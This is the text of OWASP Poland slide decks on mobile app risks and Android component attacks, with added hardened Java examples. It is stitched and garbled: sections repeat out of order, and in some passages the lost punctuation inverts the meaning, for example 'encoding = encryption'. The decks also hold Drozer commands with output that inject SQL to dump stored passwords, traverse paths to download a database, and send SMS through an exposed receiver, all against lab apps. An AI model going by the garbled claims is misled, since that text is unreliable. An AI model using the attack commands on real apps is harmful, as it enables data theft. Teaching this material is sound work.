bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
– Other application via intent/content provider
– Shared file
– Server response
– Third party website
Client side injection – what to inject
• SQL injection to local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. other application, system service, running a new activity, etc.) via special objects called Intents
import android.content.Intent;
import android.net.Uri;

// Implicit intent: the system picks an app able to display the URL
Intent viewIntent = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
// Implicit intent: ask any camera app to capture an image
Intent captureIntent = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections
dz> run scanner.provider.injection -a <package_name>
• Data path traversal
dz> run scanner.provider.traversal -a <package_name>
• Intent injections
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows for remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent-filter. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and verify if:
– a session expires (copy a cookie and try to use it after 30 minutes)
– a session is destroyed after the authentication state changes (e.g. switching from one logged in user to another logged in user)
– you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that "sessions have to expire"...
• ...but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts... 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawelrzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
– APKOptic
– Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
(diagram: DEX → JAR → JAVA)
Decompiling - Dex2Jar
• dex2jar
– Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– Allows the use of any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
– Closed source Java decompiler
– Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
(screenshots: JD-GUI, Luyten)
Disassembling
(diagram: DEX → SMALI)
Disassembling
• Apktool
– Open source Java tool for reverse-engineering Android apps
– Transforms binary Dalvik byte code (dex) into Smali source
Signing apk
• Using signapk.jar
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
Content providers attacks
• Unrestricted access to app database – Just query it – run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
Content providers
dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to app database
Content providers
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Accessible content URIs:
  content://com.mwr.example.sieve.DBContentProvider/Keys
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
Content providers
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: ")" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
| Password         | pin  |
| thisismypassword | 9876 |
Content providers attacks
• Path traversal
Content providers
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Written 24576 bytes
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements, such as Battery Low, boot completed, headset plug, etc. Though most of the broadcast receivers are originated by the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send intent and enjoy
Broadcast receivers attacks
Sample manifest from GoatDroid:
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
...
<uses-permission android:name="android.permission.SEND_SMS" />
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    // Neither the sender nor the extras are checked: any app can set phoneNumber and message
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
Broadcast receivers attacks
dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies for all abovementioned items:
• Setting the android:exported attribute to false (only the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
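An added hardened version of the GoatDroid receiver (not GoatDroid's own code) applying both defenses above: it is registered as not exported, or behind a signature-level permission on older releases, and it validates the action and the extras before sending anything. The permission name and the com.example package are assumptions.

```java
// Added example: the SOCIAL_SMS receiver with the two defenses applied.
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.os.Build;
import android.telephony.SmsManager;

public class SendSmsReceiver extends BroadcastReceiver {
    static final String ACTION_SOCIAL_SMS = "org.owasp.goatdroid.fourgoats.SOCIAL_SMS";

    // Signature-level permission, assumed to be declared in the manifest as
    //   <permission android:name="com.example.permission.SOCIAL_SMS"
    //               android:protectionLevel="signature" />
    // Only apps signed with the same key as this one can hold it.
    static final String PERM_SOCIAL_SMS = "com.example.permission.SOCIAL_SMS";

    @Override
    public void onReceive(Context context, Intent intent) {
        // 1. Only the action this receiver was written for.
        if (intent == null || !ACTION_SOCIAL_SMS.equals(intent.getAction())) return;

        // 2. Extras are caller-controlled: check presence and shape before use.
        //    The GoatDroid version passes them straight to sendTextMessage().
        String number = intent.getStringExtra("phoneNumber");
        String message = intent.getStringExtra("message");
        if (number == null || message == null) return;
        if (!number.matches("\\+?[0-9]{3,15}") || message.length() > 160) return;

        SmsManager.getDefault().sendTextMessage(number, null, message, null, null);
    }

    // Registration that keeps the receiver off the exported surface. Compare the
    // GoatDroid manifest above, where an <intent-filter> without any permission
    // makes the receiver reachable by every app on the device.
    static void register(Context context, SendSmsReceiver receiver) {
        IntentFilter filter = new IntentFilter(ACTION_SOCIAL_SMS);
        if (Build.VERSION.SDK_INT >= 33) {
            // API 33+: explicit not-exported flag, same effect as android:exported="false"
            context.registerReceiver(receiver, filter, Context.RECEIVER_NOT_EXPORTED);
        } else {
            // Older releases: gate delivery behind the signature permission
            context.registerReceiver(receiver, filter, PERM_SOCIAL_SMS, null);
        }
    }
}
```

With RECEIVER_NOT_EXPORTED the app's own components must send the broadcast explicitly (setPackage or setComponent) for it to be delivered; that is the intended trade-off.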
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you with basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about...
Before we start... the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
– SQLite databases (local)
– XML Data Stores
– Plain text configuration files
– Cookie stores
– SD Card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes in sdcard before and after installing an application
• Analyze package files at different stages
adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or does it incorrectly
What do you mean "incorrectly"?
• Insecure implementations are:
– Using known weak ciphers/versions (e.g. SSLv2/SSLv3, RC4)
– Securing only part of the communication (e.g. only authentication)
– Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embedded in the source code: the expected X.509 certificate or public key
if (presented_cert == pinned_cert)
    Start_connection()
else
    Drop_connection()
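The pseudocode above as an added, runnable example (not from the slides): a TrustManager that performs the normal chain-of-trust validation first and then compares the SHA-256 hash of the leaf certificate's public key with a pinned value. The pin constant is a placeholder to be computed from your own server's certificate.

```java
// Added example: public-key pinning on top of the platform's chain validation.
import java.net.URL;
import java.security.KeyStore;
import java.security.MessageDigest;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.TrustManagerFactory;
import javax.net.ssl.X509TrustManager;

public class PinnedTrustManager implements X509TrustManager {

    // Hex SHA-256 of the leaf certificate's SubjectPublicKeyInfo (DER). Placeholder;
    // compute it from your own certificate, e.g.
    //   openssl x509 -in server.pem -pubkey -noout | openssl pkey -pubin -outform der | sha256sum
    private static final String PINNED_SPKI_SHA256 = "<replace-with-your-pin>";

    private final X509TrustManager system;

    public PinnedTrustManager() throws Exception {
        TrustManagerFactory tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init((KeyStore) null);   // null = the platform CA store
        X509TrustManager found = null;
        for (TrustManager tm : tmf.getTrustManagers()) {
            if (tm instanceof X509TrustManager) { found = (X509TrustManager) tm; break; }
        }
        if (found == null) throw new IllegalStateException("no X509TrustManager available");
        system = found;
    }

    static String spkiSha256Hex(X509Certificate cert) throws Exception {
        byte[] digest = MessageDigest.getInstance("SHA-256").digest(cert.getPublicKey().getEncoded());
        StringBuilder sb = new StringBuilder();
        for (byte b : digest) sb.append(String.format("%02x", b));
        return sb.toString();
    }

    @Override
    public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        // Step 1: the chain-of-trust check a browser would do. The broken apps in
        // the Hannover study skipped exactly this step (an empty method body).
        system.checkServerTrusted(chain, authType);
        // Step 2: the pin. chain[0] is the leaf presented by the server.
        try {
            if (!PINNED_SPKI_SHA256.equalsIgnoreCase(spkiSha256Hex(chain[0]))) {
                throw new CertificateException("public key pin mismatch for " + chain[0].getSubjectX500Principal());
            }
        } catch (CertificateException e) {
            throw e;
        } catch (Exception e) {
            throw new CertificateException("pin check failed", e);
        }
    }

    @Override
    public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        system.checkClientTrusted(chain, authType);
    }

    @Override
    public X509Certificate[] getAcceptedIssuers() {
        return system.getAcceptedIssuers();
    }

    // Hostname verification is separate from certificate validation; the default
    // HttpsURLConnection verifier is left in place, so the "accept all hostnames"
    // mistake from the next slide is avoided as well.
    public static HttpsURLConnection open(String url) throws Exception {
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, new TrustManager[] { new PinnedTrustManager() }, null);
        HttpsURLConnection conn = (HttpsURLConnection) new URL(url).openConnection();
        conn.setSSLSocketFactory(ctx.getSocketFactory());
        return conn;
    }
}
```

Pinning the key rather than the whole certificate survives certificate renewal as long as the key is kept; keep a second, backup pin for key rotation so that a rotation does not lock the app out.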
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and...
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened...
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid
mallodroid.py -f AppToCheck.apk -d javaout
• Look for end point implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain)
sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store... (chart)
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakages
Unintended data leakage – common leakage points
• URL Caching
• Copy/Paste buffer Caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged using ADB
adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what is it
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges then... your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer
dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user/see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise an operating system
• For example the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to...
• ...stay reasonable when you're going to follow advice from the Internet...
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
